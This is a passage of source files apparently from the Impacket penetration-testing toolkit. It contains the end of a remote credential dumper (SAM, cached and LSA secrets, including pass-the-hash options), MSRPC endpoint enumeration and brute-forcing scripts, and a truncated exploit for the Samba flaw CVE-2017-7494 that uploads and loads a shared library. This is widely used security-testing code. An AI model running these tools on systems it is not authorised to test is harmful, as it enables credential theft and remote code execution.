self.__outputFileName is not None:\n self.__LSASecrets.exportSecrets(self.__outputFileName)\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error('LSA hashes extraction failed: %s' % str(e))\n\n self.cleanup()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n try:\n self.cleanup()\n except:\n logging.info('Failed to perform cleanup...')\n pass\n\n def cleanup(self):\n logging.info('Cleaning up... ')\n if self.__remoteOps:\n self.__remoteOps.finish()\n self.__smbConnection.logoff()\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Performs various techniques to dump secrets from \"\n \"the remote machine without executing any agent there.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-system', action='store', help='SYSTEM hive to parse')\n parser.add_argument('-bootkey', action='store', help='bootkey for SYSTEM hive')\n parser.add_argument('-nosam', action='store_true', help='Do not retrieve SAM information', default=False)\n parser.add_argument('-nocache', action='store_true', help='Do not retrieve MSCache information', default=False)\n parser.add_argument('-nolsa', action='store_true', help='Do not retrieve LSASecrets', default=False)\n parser.add_argument('-throttle', action='store', help='Throttle in seconds between operations', default=0, type=int)\n parser.add_argument('-outputfile', action='store',\n help='base output filename. Extensions will be added for sam, secrets and cached')\n\n group = parser.add_argument_group('display options')\n group.add_argument('-history', action='store_true', help='Dump password history (NTDS and SAM hashes), and LSA secrets OldVal')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'\n ' the ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication'\n ' (128 or 256 bits)')\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n dumper = DumpSecrets(remoteName, username, password, domain, options)\n try:\n dumper.dump()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n" }, { "path": "examples/rpcdump.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# DCE/RPC endpoint mapper dumper.\n#\n# Author:\n# Javier Kohen\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# DCE/RPC.\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport logging\nimport argparse\n\nfrom impacket.http import AUTH_NTLM\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import uuid, version\nfrom impacket.dcerpc.v5 import transport, epm\nfrom impacket.dcerpc.v5.rpch import RPC_PROXY_INVALID_RPC_PORT_ERR, \\\n RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \\\n RPC_PROXY_RPC_OUT_DATA_404_ERR\n\nclass RPCDump:\n KNOWN_PROTOCOLS = {\n 135: {'bindstr': r'ncacn_ip_tcp:%s[135]'},\n 139: {'bindstr': r'ncacn_np:%s[\\pipe\\epmapper]'},\n 443: {'bindstr': r'ncacn_http:[593,RpcProxy=%s:443]'},\n 445: {'bindstr': r'ncacn_np:%s[\\pipe\\epmapper]'},\n 593: {'bindstr': r'ncacn_http:%s'}\n }\n\n def __init__(self, username = '', password = '', domain='', hashes = None, port=135):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__port = port\n self.__stringbinding = '' \n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def dump(self, remoteName, remoteHost):\n \"\"\"Dumps the list of endpoints registered with the mapper\n listening at addr. remoteName is a valid host name or IP\n address in string format.\n \"\"\"\n\n logging.info('Retrieving endpoint list from %s' % remoteName)\n\n entries = []\n\n self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remoteName\n logging.debug('StringBinding %s' % self.__stringbinding)\n rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)\n\n if self.__port in [139, 445]:\n # Setting credentials for SMB\n rpctransport.set_credentials(self.__username, self.__password, self.__domain,\n self.__lmhash, self.__nthash)\n\n # Setting remote host and port for SMB\n rpctransport.setRemoteHost(remoteHost)\n rpctransport.set_dport(self.__port)\n elif self.__port in [443]:\n # Setting credentials only for RPC Proxy, but not for the MSRPC level\n rpctransport.set_credentials(self.__username, self.__password, self.__domain,\n self.__lmhash, self.__nthash)\n\n # Usually when a server doesn't support NTLM, it also doesn't expose epmapper (nowadays\n # only RDG servers may potentially expose a epmapper via RPC Proxy).\n #\n # Also if the auth is not NTLM, there is no way to get a target\n # NetBIOS name, but epmapper ACL requires you to specify it.\n rpctransport.set_auth_type(AUTH_NTLM)\n else:\n # We don't need to authenticate to 135 and 593 ports\n pass\n\n try:\n entries = self.__fetchList(rpctransport)\n except Exception as e:\n #raise\n\n # This may contain UTF-8\n error_text = 'Protocol failed: %s' % e\n logging.critical(error_text)\n\n if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or \\\n RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \\\n RPC_PROXY_CONN_A1_404_ERR in error_text or \\\n RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:\n logging.critical(\"This usually means the target does not allow \"\n \"to connect to its epmapper using RpcProxy.\")\n return\n\n # Display results.\n\n endpoints = {}\n # Let's groups the UUIDS\n for entry in entries:\n binding = epm.PrintStringBinding(entry['tower']['Floors'])\n tmpUUID = str(entry['tower']['Floors'][0])\n if (tmpUUID in endpoints) is not True:\n endpoints[tmpUUID] = {}\n endpoints[tmpUUID]['Bindings'] = list()\n if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18] in epm.KNOWN_UUIDS:\n endpoints[tmpUUID]['EXE'] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]]\n else:\n endpoints[tmpUUID]['EXE'] = 'N/A'\n endpoints[tmpUUID]['annotation'] = entry['annotation'][:-1].decode('utf-8')\n endpoints[tmpUUID]['Bindings'].append(binding)\n\n if tmpUUID[:36] in epm.KNOWN_PROTOCOLS:\n endpoints[tmpUUID]['Protocol'] = epm.KNOWN_PROTOCOLS[tmpUUID[:36]]\n else:\n endpoints[tmpUUID]['Protocol'] = \"N/A\"\n #print(\"Transfer Syntax: %s\" % entry['tower']['Floors'][1])\n \n for endpoint in list(endpoints.keys()):\n print(\"Protocol: %s \" % endpoints[endpoint]['Protocol'])\n print(\"Provider: %s \" % endpoints[endpoint]['EXE'])\n print(\"UUID : %s %s\" % (endpoint, endpoints[endpoint]['annotation']))\n print(\"Bindings: \")\n for binding in endpoints[endpoint]['Bindings']:\n print(\" %s\" % binding)\n print(\"\")\n\n if entries:\n num = len(entries)\n if 1 == num:\n logging.info('Received one endpoint.')\n else:\n logging.info('Received %d endpoints.' % num)\n else:\n logging.info('No endpoints found.')\n\n\n def __fetchList(self, rpctransport):\n dce = rpctransport.get_dce_rpc()\n\n dce.connect()\n #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_INTEGRITY)\n #dce.bind(epm.MSRPC_UUID_PORTMAP)\n #rpcepm = epm.DCERPCEpm(dce)\n\n resp = epm.hept_lookup(None, dce=dce)\n\n dce.disconnect()\n\n return resp\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Dumps the remote RPC enpoints information via epmapper.\")\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. If '\n 'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n 'name and you cannot resolve it')\n group.add_argument('-port', choices=['135', '139', '443', '445', '593'], nargs='?', default='135', metavar=\"destination port\",\n help='Destination port to connect to RPC Endpoint Mapper')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n dumper = RPCDump(username, password, domain, options.hashes, int(options.port))\n\n dumper.dump(remoteName, options.target_ip)\n" }, { "path": "examples/rpcmap.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Scan for listening MSRPC interfaces\n#\n# This binds to the MGMT interface and gets a list of interface UUIDs.\n# If the MGMT interface is not available, it takes a list of interface UUIDs\n# seen in the wild and tries to bind to each interface.\n#\n# If -brute-opnums is specified, the script tries to call each of the first N\n# operation numbers for each UUID in turn and reports the outcome of each call.\n#\n# This can generate a burst of connections to the given endpoint!\n#\n# Authors:\n# Catalin Patulea \n# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)\n#\n# TODO:\n# [ ] The rpcmap.py connections are never closed. We need to close them.\n# This will require changing SMB and RPC libraries.\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport re\nimport sys\nimport logging\nimport argparse\n\nfrom impacket.http import AUTH_BASIC\nfrom impacket.examples import logger, rpcdatabase\nfrom impacket.examples.utils import parse_identity\nfrom impacket import uuid, version\nfrom impacket.dcerpc.v5.epm import KNOWN_UUIDS\nfrom impacket.dcerpc.v5 import transport, rpcrt, epm\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.transport import DCERPCStringBinding, \\\n SMBTransport\nfrom impacket.dcerpc.v5 import mgmt\nfrom impacket.dcerpc.v5.rpch import RPC_PROXY_CONN_A1_401_ERR, \\\n RPC_PROXY_INVALID_RPC_PORT_ERR, RPC_PROXY_HTTP_IN_DATA_401_ERR, \\\n RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \\\n RPC_PROXY_RPC_OUT_DATA_404_ERR\n\n\nclass RPCMap():\n def __init__(self, stringbinding='', authLevel=6, bruteUUIDs=False, uuids=(),\n bruteOpnums=False, opnumMax=64, bruteVersions=False, versionMax=64):\n try:\n self.__stringbinding = DCERPCStringBinding(stringbinding)\n except:\n raise Exception(\"Provided stringbinding is not correct\")\n\n # Empty network address is used to specify that the network address\n # must be obtained from NTLMSSP of RPC proxy.\n if self.__stringbinding.get_network_address() == '' and \\\n not self.__stringbinding.is_option_set(\"RpcProxy\"):\n raise Exception(\"Provided stringbinding is not correct\")\n\n self.__authLevel = authLevel\n self.__brute_uuids = bruteUUIDs\n self.__uuids = uuids\n self.__brute_opnums = bruteOpnums\n self.__opnum_max = opnumMax\n self.__brute_versions = bruteVersions\n self.__version_max = versionMax\n\n self.__msrpc_lockout_protection = False\n self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)\n self.__dce = self.__rpctransport.get_dce_rpc()\n\n def get_rpc_transport(self):\n return self.__rpctransport\n\n def set_transport_credentials(self, username, password, domain='', hashes=None):\n if hashes is not None:\n lmhash, nthash = hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n if hasattr(self.__rpctransport, 'set_credentials'):\n self.__rpctransport.set_credentials(username, password, domain, lmhash, nthash)\n\n def set_rpc_credentials(self, username, password, domain='', hashes=None):\n if hashes is not None:\n lmhash, nthash = hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n if hasattr(self.__dce, 'set_credentials'):\n self.__dce.set_credentials(username, password, domain, lmhash, nthash)\n\n if username != '' or password != '' or hashes != '':\n self.__msrpc_lockout_protection = True\n\n def set_smb_info(self, smbhost=None, smbport=None):\n if isinstance(self.__rpctransport, SMBTransport):\n if smbhost:\n self.__rpctransport.setRemoteHost(smbhost)\n if smbport:\n self.__rpctransport.set_dport(smbport)\n\n def connect(self):\n self.__dce.set_auth_level(self.__authLevel)\n self.__dce.connect()\n\n def disconnect(self):\n self.__dce.disconnect()\n\n def do(self):\n try:\n # Connecting to MGMT interface\n self.__dce.bind(mgmt.MSRPC_UUID_MGMT)\n\n # Retrieving interfaces UUIDs from the MGMT interface\n ifids = mgmt.hinq_if_ids(self.__dce)\n\n # If -brute-uuids is set, bruteforcing UUIDs instead of parsing ifids\n # We must do it after mgmt.hinq_if_ids to prevent a specified account from being locked out\n if self.__brute_uuids:\n self.bruteforce_uuids()\n return\n\n uuidtups = set(\n uuid.bin_to_uuidtup(ifids['if_id_vector']['if_id'][index]['Data'].getData())\n for index in range(ifids['if_id_vector']['count'])\n )\n\n # Adding MGMT interface itself\n uuidtups.add(('AFA8BD80-7D8A-11C9-BEF4-08002B102989', '1.0'))\n\n for tup in sorted(uuidtups):\n self.handle_discovered_tup(tup)\n except DCERPCException as e:\n # nca_s_unk_if for Windows SMB\n # reason_not_specified for Samba 4\n # abstract_syntax_not_supported for Samba 3\n if str(e).find('nca_s_unk_if') >= 0 or \\\n str(e).find('reason_not_specified') >= 0 or \\\n str(e).find('abstract_syntax_not_supported') >= 0:\n logging.info(\"Target MGMT interface not available\")\n logging.info(\"Bruteforcing UUIDs. The result may not be complete.\")\n self.bruteforce_uuids()\n elif str(e).find('rpc_s_access_denied') and self.__msrpc_lockout_protection == False:\n logging.info(\"Target MGMT interface requires authentication, but no credentials provided.\")\n logging.info(\"Bruteforcing UUIDs. The result may not be complete.\")\n self.bruteforce_uuids()\n else:\n raise\n\n def bruteforce_versions(self, interface_uuid):\n results = []\n\n for i in range(self.__version_max + 1):\n binuuid = uuid.uuidtup_to_bin((interface_uuid, \"%d.0\" % i))\n # Is there a way to test multiple opnums in a single rpc channel?\n self.__dce.connect()\n\n try:\n self.__dce.bind(binuuid)\n except Exception as e:\n if str(e).find(\"abstract_syntax_not_supported\") >= 0:\n results.append(\"abstract_syntax_not_supported (version not supported)\")\n else:\n results.append(str(e))\n else:\n results.append(\"success\")\n\n if len(results) > 1 and results[-1] == results[-2]:\n suffix = results[-1]\n while results and results[-1] == suffix:\n results.pop()\n\n for i, result in enumerate(results):\n print(\"Versions %d: %s\" % (i, result))\n\n print(\"Versions %d-%d: %s\" % (len(results), self.__version_max, suffix))\n else:\n for i, result in enumerate(results):\n print(\"Versions %d: %s\" % (i, result))\n\n def bruteforce_opnums(self, binuuid):\n results = []\n\n for i in range(self.__opnum_max + 1):\n # Is there a way to test multiple opnums in a single rpc channel?\n self.__dce.connect()\n self.__dce.bind(binuuid)\n self.__dce.call(i, b\"\")\n\n try:\n self.__dce.recv()\n except Exception as e:\n if str(e).find(\"nca_s_op_rng_error\") >= 0:\n results.append(\"nca_s_op_rng_error (opnum not found)\")\n else:\n results.append(str(e))\n else:\n results.append(\"success\")\n\n if len(results) > 1 and results[-1] == results[-2]:\n suffix = results[-1]\n while results and results[-1] == suffix:\n results.pop()\n\n for i, result in enumerate(results):\n print(\"Opnum %d: %s\" % (i, result))\n\n print(\"Opnums %d-%d: %s\" % (len(results), self.__opnum_max, suffix))\n else:\n for i, result in enumerate(results):\n print(\"Opnum %d: %s\" % (i, result))\n\n def bruteforce_uuids(self):\n for tup in sorted(self.__uuids):\n # Is there a way to test multiple UUIDs in a single rpc channel?\n self.__dce.connect()\n binuuid = uuid.uuidtup_to_bin(tup)\n\n try:\n self.__dce.bind(binuuid)\n except rpcrt.DCERPCException as e:\n # For Windows SMB\n if str(e).find('abstract_syntax_not_supported') >= 0:\n continue\n # For Samba\n if str(e).find('nca_s_proto_error') >= 0:\n continue\n # For Samba\n if str(e).find('reason_not_specified') >= 0:\n continue\n\n self.handle_discovered_tup(tup)\n\n logging.info(\"Tested %d UUID(s)\", len(self.__uuids))\n\n def handle_discovered_tup(self, tup):\n if tup[0] in epm.KNOWN_PROTOCOLS:\n print(\"Protocol: %s\" % (epm.KNOWN_PROTOCOLS[tup[0]]))\n else:\n print(\"Procotol: N/A\")\n\n if uuid.uuidtup_to_bin(tup)[: 18] in KNOWN_UUIDS:\n print(\"Provider: %s\" % (KNOWN_UUIDS[uuid.uuidtup_to_bin(tup)[:18]]))\n else:\n print(\"Provider: N/A\")\n\n print(\"UUID: %s v%s\" % (tup[0], tup[1]))\n\n if self.__brute_versions:\n self.bruteforce_versions(tup[0])\n\n if self.__brute_opnums:\n try:\n self.bruteforce_opnums(uuid.uuidtup_to_bin(tup))\n except DCERPCException as e:\n if str(e).find('abstract_syntax_not_supported') >= 0:\n print(\"Listening: False\")\n else:\n raise\n print()\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n class SmartFormatter(argparse.HelpFormatter):\n def _split_lines(self, text, width):\n if text.startswith('R|'):\n return text[2:].splitlines() \n else:\n return argparse.HelpFormatter._split_lines(self, text, width)\n\n parser = argparse.ArgumentParser(add_help=True, formatter_class=SmartFormatter, description=\"Lookups listening MSRPC interfaces.\")\n parser.add_argument('stringbinding', help='R|String binding to connect to MSRPC interface, for example:\\n'\n 'ncacn_ip_tcp:192.168.0.1[135]\\n'\n 'ncacn_np:192.168.0.1[\\\\pipe\\\\spoolss]\\n'\n 'ncacn_http:192.168.0.1[593]\\n'\n 'ncacn_http:[6001,RpcProxy=exchange.contoso.com:443]\\n'\n 'ncacn_http:localhost[3388,RpcProxy=rds.contoso:443]'\n )\n parser.add_argument('-brute-uuids', action='store_true', help='Bruteforce UUIDs even if MGMT interface is available')\n parser.add_argument('-brute-opnums', action='store_true', help='Bruteforce opnums for found UUIDs')\n parser.add_argument('-brute-versions', action='store_true', help='Bruteforce major versions of found UUIDs')\n parser.add_argument('-opnum-max', action='store', type=int, default=64, help='Bruteforce opnums from 0 to N, default 64')\n parser.add_argument('-version-max', action='store', type=int, default=64, help='Bruteforce versions from 0 to N, default 64')\n parser.add_argument('-auth-level', action='store', type=int, default=6, help='MS-RPCE auth level, from 1 to 6, default 6 '\n '(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)')\n parser.add_argument('-uuid', action='store', help='Test only this UUID')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('ncacn-np-details')\n\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. '\n 'If omitted it will use whatever was specified as target. This is useful when target is the '\n 'NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-auth-rpc', action='store', default='', help='[domain/]username[:password]')\n group.add_argument('-auth-transport', action='store', default='', help='[domain/]username[:password]')\n group.add_argument('-hashes-rpc', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-hashes-transport', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for passwords')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n rpcdomain, rpcuser, rpcpass, _, _, _ = parse_identity(options.auth_rpc, options.hashes_rpc, options.no_pass, getpass_msg='Password for MSRPC communication:')\n transportdomain, transportuser, transportpass, _, _, _ = parse_identity(options.auth_transport, options.hashes_transport, options.no_pass, getpass_msg='Password for RPC transport (SMB or HTTP):')\n\n if options.brute_opnums and options.brute_versions:\n logging.error(\"Specify only -brute-opnums or -brute-versions\")\n sys.exit(1)\n\n if options.uuid is not None:\n uuids = [uuid.string_to_uuidtup(options.uuid)]\n options.brute_uuids = True\n else:\n uuids = rpcdatabase.uuid_database\n\n try:\n lookuper = RPCMap(options.stringbinding, options.auth_level, options.brute_uuids, uuids,\n options.brute_opnums, options.opnum_max, options.brute_versions, options.version_max)\n lookuper.set_rpc_credentials(rpcuser, rpcpass, rpcdomain, options.hashes_rpc)\n lookuper.set_transport_credentials(transportuser, transportpass, transportdomain, options.hashes_transport)\n lookuper.set_smb_info(options.target_ip, options.port)\n lookuper.connect()\n lookuper.do()\n lookuper.disconnect()\n except Exception as e:\n #raise\n\n # This may contain UTF-8\n error_text = 'Protocol failed: %s' % e\n logging.critical(error_text)\n\n # Exchange errors\n if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text:\n logging.critical(\"This usually means the target is a MS Exchange Server, \"\n \"and connections to this rpc port on this host are not allowed (try port 6001)\")\n\n if RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \\\n RPC_PROXY_CONN_A1_404_ERR in error_text:\n logging.critical(\"This usually means the target is a MS Exchange Server, \"\n \"and connections to the specified RPC server are not allowed\")\n\n # Other errors\n if RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:\n logging.critical(\"This usually means the target has no ACL to connect to this endpoint using RpcProxy\")\n\n if RPC_PROXY_HTTP_IN_DATA_401_ERR in error_text or RPC_PROXY_CONN_A1_401_ERR in error_text:\n if lookuper.get_rpc_transport().get_auth_type() == AUTH_BASIC and transportdomain == '':\n logging.critical(\"RPC proxy basic authentication might require you to specify the domain. \"\n \"Your domain is empty!\")\n\n if RPC_PROXY_CONN_A1_401_ERR in error_text or \\\n RPC_PROXY_CONN_A1_404_ERR in error_text:\n logging.info(\"A proxy in front of the target server detected (may be WAF / SIEM)\")\n\n if 'rpc_s_access_denied' in error_text:\n logging.critical(\"This usually means the credentials on the MSRPC level are invalid!\")\n" }, { "path": "examples/sambaPipe.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through\n# the -so parameter.\n#\n# The script will use SMB1 or SMB2/3 depending on the target's availability. Also, the target share pathname is\n# retrieved by using NetrShareEnum() API with info level 2.\n#\n# Example:\n#\n# ./sambaPipe.py -so poc/libpoc.linux64.so bill@10.90.1.1\n#\n# It will upload the libpoc.linux64.so file located in the poc directory against the target 10.90.1.1. The username\n# to use for authentication will be 'bill' and the password will be asked.\n#\n# ./sambaPipe.py -so poc/libpoc.linux64.so 10.90.1.1\n#\n# Same as before, but anonymous authentication will be used.\n#\n# Author:\n# beto (@agsolino)\n#\n\nimport argparse\nimport logging\nimport sys\nfrom os import path\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.nt_errors import STATUS_SUCCESS\nfrom impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \\\n FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE\nfrom impacket.smb3structs import SMB2_IL_IMPERSONATION, SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2Create, SMB2Packet, \\\n SMB2Create_Response, SMB2_OPLOCK_LEVEL_NONE, SMB2_SESSION_FLAG_ENCRYPT_DATA\nfrom impacket.smbconnection import SMBConnection\n\n\nclass PIPEDREAM:\n def __init__(self, smbClient, options):\n self.__smbClient = smbClient\n self.__options = options\n\n def isShareWritable(self, shareName):\n logging.debug('Checking %s for write access' % shareName)\n try:\n logging.debug('Connecting to share %s' % shareName)\n tid = self.__smbClient.connectTree(shareName)\n except Exception as e:\n logging.debug(str(e))\n return False\n\n try:\n self.__smbClient.openFile(tid, '\\\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)\n writable = True\n except Exception:\n writable = False\n pass\n\n return writable\n\n def findSuitableShare(self):\n from impacket.dcerpc.v5 import transport, srvs\n rpctransport = transport.SMBTransport(self.__smbClient.getRemoteName(), self.__smbClient.getRemoteHost(),\n filename=r'\\srvsvc', smb_connection=self.__smbClient)\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n dce.bind(srvs.MSRPC_UUID_SRVS)\n resp = srvs.hNetrShareEnum(dce, 2)\n for share in resp['InfoStruct']['ShareInfo']['Level2']['Buffer']:\n if self.isShareWritable(share['shi2_netname'][:-1]):\n sharePath = share['shi2_path'].split(':')[-1:][0][:-1]\n return share['shi2_netname'][:-1], sharePath\n\n raise Exception('No suitable share found, aborting!')\n\n def uploadSoFile(self, shareName):\n # Let's extract the filename from the input file pathname\n fileName = path.basename(self.__options.so.replace('\\\\', '/'))\n logging.info('Uploading %s to target' % fileName)\n fh = open(self.__options.so, 'rb')\n self.__smbClient.putFile(shareName, fileName, fh.read)\n fh.close()\n return fileName\n\n def create(self, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, fileAttributes,\n impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, oplockLevel=SMB2_OPLOCK_LEVEL_NONE,\n createContexts=None):\n\n packet = self.__smbClient.getSMBServer().SMB_PACKET()\n packet['Command'] = SMB2_CREATE\n packet['TreeID'] = treeId\n if self.__smbClient._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True:\n packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS\n\n smb2Create = SMB2Create()\n smb2Create['SecurityFlags'] = 0\n smb2Create['RequestedOplockLevel'] = oplockLevel\n smb2Create['ImpersonationLevel'] = impersonationLevel\n smb2Create['DesiredAccess'] = desiredAccess\n smb2Create['FileAttributes'] = fileAttributes\n smb2Create['ShareAccess'] = shareMode\n smb2Create['CreateDisposition'] = creationDisposition\n smb2Create['CreateOptions'] = creationOptions\n\n smb2Create['NameLength'] = len(fileName) * 2\n if fileName != '':\n smb2Create['Buffer'] = fileName.encode('utf-16le')\n else:\n smb2Create['Buffer'] = b'\\x00'\n\n if createContexts is not None:\n smb2Create['Buffer'] += createContexts\n smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength']\n smb2Create['CreateContextsLength'] = len(createContexts)\n else:\n smb2Create['CreateContextsOffset'] = 0\n smb2Create['CreateContextsLength'] = 0\n\n packet['Data'] = smb2Create\n\n packetID = self.__smbClient.getSMBServer().sendSMB(packet)\n ans = self.__smbClient.getSMBServer().recvSMB(packetID)\n if ans.isValidAnswer(STATUS_SUCCESS):\n createResponse = SMB2Create_Response(ans['Data'])\n\n # The client MUST generate a handle for the Open, and it MUST\n # return success and the generated handle to the calling application.\n # In our case, str(FileID)\n return str(createResponse['FileID'])\n\n def openPipe(self, sharePath, fileName):\n # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style\n # to make things easier for the caller. Not this time ;)\n treeId = self.__smbClient.connectTree('IPC$')\n sharePath = sharePath.replace('\\\\', '/')\n pathName = '/' + path.join(sharePath, fileName)\n logging.info('Final path to load is %s' % pathName)\n logging.info('Triggering bug now, cross your fingers')\n\n if self.__smbClient.getDialect() == SMB_DIALECT:\n _, flags2 = self.__smbClient.getSMBServer().get_flags()\n\n pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName\n\n ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX)\n ntCreate['Parameters'] = SMBNtCreateAndX_Parameters()\n ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2)\n ntCreate['Parameters']['FileNameLength'] = len(pathName)\n ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA\n 